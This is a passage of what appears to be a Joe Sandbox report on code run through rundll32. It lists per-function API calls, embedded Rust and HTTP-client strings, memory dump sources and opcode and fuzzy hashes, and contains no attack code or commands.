                              • Instruction Fuzzy Hash: 58D17CB1E00318AFEB14DFE9D885A9EBBB9FF48700F10412DE506A7251E770B905CBA5
                              APIs
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC0F274
                              • memmove.VCRUNTIME140(?,?,00000220), ref: 6CC0F28B
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC0F2F6
                              • memmove.VCRUNTIME140(?,?,000000C8), ref: 6CC0F30D
                              • memmove.VCRUNTIME140(?,?,00000168), ref: 6CC0F35A
                              Strings
                              • HTTP/1.1 200HTTP/1.0 200HTTP/1.1 407unsuccessful tunnelproxy authentication requiredproxy headers too long for tunnel, xrefs: 6CC0EBB6
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: HTTP/1.1 200HTTP/1.0 200HTTP/1.1 407unsuccessful tunnelproxy authentication requiredproxy headers too long for tunnel
                              • API String ID: 2162964266-2977587669
                              • Opcode ID: 42bb8f862aa6e3fd56cb3cbad952c3070d3bebc1886bfe85a6a8a063cf0c681c
                              • Instruction ID: b78b6ce5831d0ad72da52fa643dd12d8e286e9d60d34aeee8d6a7b9773e8de5f
                              • Opcode Fuzzy Hash: 42bb8f862aa6e3fd56cb3cbad952c3070d3bebc1886bfe85a6a8a063cf0c681c
                              • Instruction Fuzzy Hash: 19D1F2306087459FD715CF24C498BDAB7E1FF44308F18856EE89D8B791E732A989CB82
                              APIs
                              • memmove.VCRUNTIME140(?,?,0000010C), ref: 6CC1A494
                              • memmove.VCRUNTIME140(?,?,0000010C), ref: 6CC1A4BC
                              • memmove.VCRUNTIME140(?,?,0000002B), ref: 6CC1A604
                              Strings
                              • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CC1A6BF
                              • HTTP/2 connection in progressD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.32\src\common\lazy.rs, xrefs: 6CC1A4F3
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: HTTP/2 connection in progressD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.32\src\common\lazy.rs$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
                              • API String ID: 2162964266-2665790016
                              • Opcode ID: 1355bb7b342c1b6ec00c2ce26812588080b948c51796692c664aa68bb4ee3bec
                              • Instruction ID: d73e909414e0430eaf528e64d3035d4e7a6f137cd5be6048665dae8744def87d
                              • Opcode Fuzzy Hash: 1355bb7b342c1b6ec00c2ce26812588080b948c51796692c664aa68bb4ee3bec
                              • Instruction Fuzzy Hash: E471B1329087409BCB51CF25C480ADBB7E5AFC9314F04896EE8999FA81EB70D54DDB92
                              APIs
                              • __CreateFrameInfo.LIBCMT ref: 0467FF90
                                • Part of subcall function 0467FA76: __getptd.LIBCMT ref: 0467FA84
                                • Part of subcall function 0467FA76: __getptd.LIBCMT ref: 0467FA92
                              • __getptd.LIBCMT ref: 0467FF9A
                                • Part of subcall function 04673800: __getptd_noexit.LIBCMT ref: 04673803
                                • Part of subcall function 04673800: __amsg_exit.LIBCMT ref: 04673810
                              • __getptd.LIBCMT ref: 0467FFA8
                              • __getptd.LIBCMT ref: 0467FFB6
                              • __getptd.LIBCMT ref: 0467FFC1
                              • _CallCatchBlock2.LIBCMT ref: 0467FFE7
                                • Part of subcall function 0467FB1B: __CallSettingFrame@12.LIBCMT ref: 0467FB67
                                • Part of subcall function 0468008E: __getptd.LIBCMT ref: 0468009D
                                • Part of subcall function 0468008E: __getptd.LIBCMT ref: 046800AB
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                              • String ID:
                              • API String ID: 1602911419-0
                              • Opcode ID: 140e0ecad3f6b823f00cca1794e70136b3e8d5fc798de5bcffb231a482b4ed6d
                              • Instruction ID: 2b6e076a857263dfa1f971dcfe8a0473c53bb9b33470f4c5a0a09cb9f233f278
                              • Opcode Fuzzy Hash: 140e0ecad3f6b823f00cca1794e70136b3e8d5fc798de5bcffb231a482b4ed6d
                              • Instruction Fuzzy Hash: 8311C9B1D01209DFEB00EFA4D844AAE7BB0FF04318F118569E814A7350EB39A955DB55
                              APIs
                              • CertFreeCertificateContext.CRYPT32 ref: 6CC36AFE
                              • CertFreeCertificateContext.CRYPT32 ref: 6CC36B20
                              • CertFreeCertificateChain.CRYPT32(?), ref: 6CC36B32
                              Strings
                              • unable to find any user-specified roots in the final cert chain, xrefs: 6CC36B60
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: CertCertificateFree$Context$Chain
                              • String ID: unable to find any user-specified roots in the final cert chain
                              • API String ID: 1586265559-2994100780
                              • Opcode ID: 379054d62f913180ae92d07e10af56e8b95379dad41e3811e974192944e004d6
                              • Instruction ID: b93036af93cd9bc4d2d00d2c7086ea33173f4747fbe38ffbefee835c0f6e5409
                              • Opcode Fuzzy Hash: 379054d62f913180ae92d07e10af56e8b95379dad41e3811e974192944e004d6
                              • Instruction Fuzzy Hash: 2A317A316087109BC304DF25D980A5EBBF1BF89318F14C869E9888B750EB31DC89DB52
                              APIs
                              Strings
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC4D096
                              • TryFromIntErrorOS can't spawn worker thread: , xrefs: 6CC4D0DA
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: lstrlenmemcmp
                              • String ID: TryFromIntErrorOS can't spawn worker thread: $called `Result::unwrap()` on an `Err` value
                              • API String ID: 1799893992-1221440643
                              • Opcode ID: 3487c73a01923965479b6a678ec0ccab5a38b6a827eb87b16e4dcec18cdec15a
                              • Instruction ID: d53045d42c055c2d7e6017b12febd06dbe4bc3a14a9eaba211d430236f461a7e
                              • Opcode Fuzzy Hash: 3487c73a01923965479b6a678ec0ccab5a38b6a827eb87b16e4dcec18cdec15a
                              • Instruction Fuzzy Hash: CE81A471E002099FCB14DF99C841AAEB7B6FF88358F24C129E815A7B61F735E945CB90
                              APIs
                              • __getptd.LIBCMT ref: 046749B1
                                • Part of subcall function 04673800: __getptd_noexit.LIBCMT ref: 04673803
                                • Part of subcall function 04673800: __amsg_exit.LIBCMT ref: 04673810
                              • __getptd.LIBCMT ref: 046749C8
                              • __amsg_exit.LIBCMT ref: 046749D6
                              • __lock.LIBCMT ref: 046749E6
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 046749FA
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                              • String ID:
                              • API String ID: 938513278-0
                              • Opcode ID: 280a9a565fc38ed5b47a2f998a82c103bd79174b764588edcd66638793cc0719
                              • Instruction ID: 751eb702b47c613ac13ace45cd0b7456477734045352cc989635f618e640f94a
                              • Opcode Fuzzy Hash: 280a9a565fc38ed5b47a2f998a82c103bd79174b764588edcd66638793cc0719
                              • Instruction Fuzzy Hash: 00F09032941320DAF760FB78980975E77A0AF00728F25410ED9246B3C1FF387991EA9E
                              APIs
                              • memmove.VCRUNTIME140(00000000,?,?), ref: 6CC46FF3
                              • memmove.VCRUNTIME140(-0000000A,?,00000000), ref: 6CC47068
                              • InitializeSecurityContextW.SECUR32(?,00000000,?,0009819C,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 6CC471EE
                              Strings
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC470A7
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$ContextInitializeSecurity
                              • String ID: called `Result::unwrap()` on an `Err` value
                              • API String ID: 1120248335-2333694755
                              • Opcode ID: a32c849bd00eaf273d48e3694b9c6634d8be0db742db25f12a121f2eaae223d4
                              • Instruction ID: 351aa1900cd369e7b6ccef0a1fd643f3a65853a875056f60bcec798e8fd266b8
                              • Opcode Fuzzy Hash: a32c849bd00eaf273d48e3694b9c6634d8be0db742db25f12a121f2eaae223d4
                              • Instruction Fuzzy Hash: F19168B16083019FD304CF19C880B6AFBE5EF85319F14C92DE5998B791EB31E849CB92
                              APIs
                              • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(00000001,000000FF,00000001,FFFFFFFF), ref: 6CC4A870
                              • GetLastError.KERNEL32 ref: 6CC4A87B
                              Strings
                              • NulErrorUtf8Errorvalid_up_toerror_len, xrefs: 6CC4A8EE
                              • use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs, xrefs: 6CC4A8A8
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressErrorLastWait
                              • String ID: NulErrorUtf8Errorvalid_up_toerror_len$use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
                              • API String ID: 1574541344-1776713852
                              • Opcode ID: e76dbb0c6ac20f9dca73e8d905182a557b9170bf347ef8df9b03b56976625270
                              • Instruction ID: ebbd7a534070af7bbc950522c936c08a11113a5223ee2f3d428c962414d54eda
                              • Opcode Fuzzy Hash: e76dbb0c6ac20f9dca73e8d905182a557b9170bf347ef8df9b03b56976625270
                              • Instruction Fuzzy Hash: 3861E671E002088FDB15CFA9C885BEEBBB5EF88314F14857AD404A7B81E7359945CB94
                              APIs
                              • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(00000001,000000FF,00000001,FFFFFFFF), ref: 6CC4A870
                              • GetLastError.KERNEL32 ref: 6CC4A87B
                              Strings
                              • NulErrorUtf8Errorvalid_up_toerror_len, xrefs: 6CC4A8EE
                              • use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs, xrefs: 6CC4A8A8
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressErrorLastWait
                              • String ID: NulErrorUtf8Errorvalid_up_toerror_len$use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
                              • API String ID: 1574541344-1776713852
                              • Opcode ID: c2e970b86cadf7cd796554d1b04e6c8d1b60524854c3ee2eff3679312e4786ec
                              • Instruction ID: 174f3cee29db198a5d4e2ed6bc7b90c50ff34faa0aab502607c66306cd0dd777
                              • Opcode Fuzzy Hash: c2e970b86cadf7cd796554d1b04e6c8d1b60524854c3ee2eff3679312e4786ec
                              • Instruction Fuzzy Hash: 7051C431A002448FDB15CF69C885BEEBBB5EB89314F14C17AD805A7B81E7359946CB90
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: $2$l
                              • API String ID: 0-3132104027
                              • Opcode ID: 8733acf2d44eca8639c91740be39d12bd9a02127ba3db65e983c88efae1b4097
                              • Instruction ID: 93f26f402bdaeea3a16f9fc6d45cb1e99d581031c08dc454b8b3a00186d6dceb
                              • Opcode Fuzzy Hash: 8733acf2d44eca8639c91740be39d12bd9a02127ba3db65e983c88efae1b4097
                              • Instruction Fuzzy Hash: B041C731A042699BDF348E1488DC3E877B2FB15355F3805DAC09A5A2A1FB756AC6CF41
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: $2$l
                              • API String ID: 0-3132104027
                              • Opcode ID: 8d09b43a9b92cbbcdd060b45c0838ecab406f7740e78c5c2131da58acf1fc95f
                              • Instruction ID: ab697be2e36eb145860d716d08e69e3310aa800382dfbf39821659209ab3142e
                              • Opcode Fuzzy Hash: 8d09b43a9b92cbbcdd060b45c0838ecab406f7740e78c5c2131da58acf1fc95f
                              • Instruction Fuzzy Hash: A541D67184426D8ADF348F149CE83E9B7B1BB12325F0801DBC19966262F374AAC7CF54
                              APIs
                              Strings
                              • assertion failed: (*tail).value.is_none(), xrefs: 6CBEBE90
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CBEBEC5
                              • assertion failed: (*next).value.is_some(), xrefs: 6CBEBEA2
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: SwitchThread
                              • String ID: assertion failed: (*next).value.is_some()$assertion failed: (*tail).value.is_none()$called `Result::unwrap()` on an `Err` value
                              • API String ID: 115865932-1206542395
                              • Opcode ID: ebd06c587ae2fc60e518fa75a4afc96131391f9bf27acd7252c2f3374490e464
                              • Instruction ID: 06a3192ab02b46195b3b0b17c459404b2dd0e10ade604e399eae39c008e96f6a
                              • Opcode Fuzzy Hash: ebd06c587ae2fc60e518fa75a4afc96131391f9bf27acd7252c2f3374490e464
                              • Instruction Fuzzy Hash: FF312630601B868FD700CF25C85076EB7E1EF8A799F108D1DE9989BB51EB70D846C792
                              APIs
                              • memmove.VCRUNTIME140(?,?,000000AC), ref: 6CC0F9AA
                              • memmove.VCRUNTIME140(?,?,000000AC), ref: 6CC0F9F0
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC0FA20
                                • Part of subcall function 6CC23A0F: memmove.VCRUNTIME140(00000000,?,000000B8,?,?,6CC0FA35), ref: 6CC23A29
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC0FA5E
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC0FAA7
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: 020269b430839bec9eae6d930f01f1575182ff2e5d540952c44a665f96251941
                              • Instruction ID: 57f1ffda750704548d462fa690afe8896672825e778ec2af8694b806efe185c5
                              • Opcode Fuzzy Hash: 020269b430839bec9eae6d930f01f1575182ff2e5d540952c44a665f96251941
                              • Instruction Fuzzy Hash: 0AA16F716087419FCB11CF24C4907DAB7E1AF8A314F08856AEC895F746EB709989CB66
                              APIs
                              • memmove.VCRUNTIME140(?,?,000000AC), ref: 6CC38176
                              • memmove.VCRUNTIME140(?,?,000000AC), ref: 6CC381BC
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC381EC
                                • Part of subcall function 6CC23A0F: memmove.VCRUNTIME140(00000000,?,000000B8,?,?,6CC0FA35), ref: 6CC23A29
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC3822A
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC38273
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: 548f74d799b366aea70baf008907f3bb68b7de111d79c96dd234008f93a7f770
                              • Instruction ID: 00854f4692848c01fc22d9368cf9f70b07fa709b626d0be9cd318be5c9acbf25
                              • Opcode Fuzzy Hash: 548f74d799b366aea70baf008907f3bb68b7de111d79c96dd234008f93a7f770
                              • Instruction Fuzzy Hash: 2FA182755087409FCB11CF24D480BDAB7E1AF89714F08896EDC8D9F746EB709949CBA2
                              APIs
                              • memmove.VCRUNTIME140(?,00000098,00000098), ref: 6CC181A2
                              • memmove.VCRUNTIME140(00000000,?,00000738), ref: 6CC181F1
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: scheme is valid$slash is a valid path
                              • API String ID: 2162964266-3029000764
                              • Opcode ID: 2731b9379dd578ccf8f3a9d96b84a2b3e5cd27c0ee9eb9075a5db6601876aa25
                              • Instruction ID: 7a53f257ce467f1945fb5504844b0b6e5223eb8642e72c662a31e32f07bc74b4
                              • Opcode Fuzzy Hash: 2731b9379dd578ccf8f3a9d96b84a2b3e5cd27c0ee9eb9075a5db6601876aa25
                              • Instruction Fuzzy Hash: 62B11531A08B818BD711CF25C4407AEB7E1BFC6358F148A1DE4885FB81EB75D94ADB82
                              APIs
                              • memmove.VCRUNTIME140(?,?,?), ref: 6CBF0491
                              • memmove.VCRUNTIME140(00000000,?,?), ref: 6CBF0570
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: capacity overflow
                              • API String ID: 2162964266-2273299319
                              • Opcode ID: 0dd87794775d159244e03a37c4f2686444cf7590ba190ba0669507e457a3e4a9
                              • Instruction ID: 0cc92f343a1ee390efb9f10c7c3daaf0939b06b6a81fb403ae0a3825757dfd6c
                              • Opcode Fuzzy Hash: 0dd87794775d159244e03a37c4f2686444cf7590ba190ba0669507e457a3e4a9
                              • Instruction Fuzzy Hash: F071E370A046869BC304DF19D59066EF3E5FF84714F10862DD8A947B60EB75EC9ACB82
                              APIs
                              • memmove.VCRUNTIME140(?,?,?), ref: 6CBF0655
                              • memmove.VCRUNTIME140(00000000,?,?), ref: 6CBF074B
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: called `Result::unwrap()` on an `Err` value$capacity overflow
                              • API String ID: 2162964266-2618782069
                              • Opcode ID: 13631eae44d6808372859e193b7e79021813851b705e000d9bcf3a0162934d9d
                              • Instruction ID: 3dbef83c43dc26e65a8eddbbd6ff08d663c44570a16dbee0ba735653d073ca60
                              • Opcode Fuzzy Hash: 13631eae44d6808372859e193b7e79021813851b705e000d9bcf3a0162934d9d
                              • Instruction Fuzzy Hash: 7C51A070608785ABC704DF59D590A5EB7E6FFC5304F10892DE4694BB61EB70E88ECB82
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: __calloc_crt__init_pointers__mtterm
                              • String ID:
                              • API String ID: 2478854527-0
                              • Opcode ID: ee1b5a3cfca8483b6adddd909e68841009dfdd7312d5b4ad701d057e656e09f0
                              • Instruction ID: c47868c48e02d05927d34beed8ce004c809d9e9aa81bbf98f7ed7a5303036b40
                              • Opcode Fuzzy Hash: ee1b5a3cfca8483b6adddd909e68841009dfdd7312d5b4ad701d057e656e09f0
                              • Instruction Fuzzy Hash: A2311B31A02630AEFB12EF759C98A567FA4EB59760B20461AF910D63B1EB319081EF50
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC59A2C
                              • CloseHandle.KERNEL32(?), ref: 6CC59A3A
                              • GetLastError.KERNEL32 ref: 6CC59AA5
                              • CloseHandle.KERNEL32(?), ref: 6CC59B06
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: CloseHandle$ErrorLastObjectSingleWait
                              • String ID:
                              • API String ID: 1454876536-0
                              • Opcode ID: 0a740527abf837646f05e9bec8d7744087c24684a375b418cb95b2015fe8bd40
                              • Instruction ID: 331760ec38cae3fec3fa0e8779db4d07ee4a0ff5be83f86a5208192cd74d83c9
                              • Opcode Fuzzy Hash: 0a740527abf837646f05e9bec8d7744087c24684a375b418cb95b2015fe8bd40
                              • Instruction Fuzzy Hash: AB31F0B1A007048FCB04DF65C984B9ABBB4FF48328F14C56DD40AABB50E735D856CBA0
                              APIs
                              • __RTC_Initialize.LIBCMT ref: 6CC6104B
                                • Part of subcall function 6CC613C6: InitializeSListHead.KERNEL32(6CCC2168,6CC61055,6CCC09F0,00000010,6CC60FE6,?,?,?,6CC6120C,?,00000001,?,?,00000001,?,6CCC0A38), ref: 6CC613CB
                              • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CC6621C,6CC66220,6CCC09F0,00000010,6CC60FE6,?,?,?,6CC6120C,?,00000001,?,?,00000001,?,6CCC0A38), ref: 6CC61064
                              • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CC66214,6CC66218,6CCC09F0,00000010,6CC60FE6,?,?,?,6CC6120C,?,00000001,?,?,00000001,?,6CCC0A38), ref: 6CC61082
                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CC610B5
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
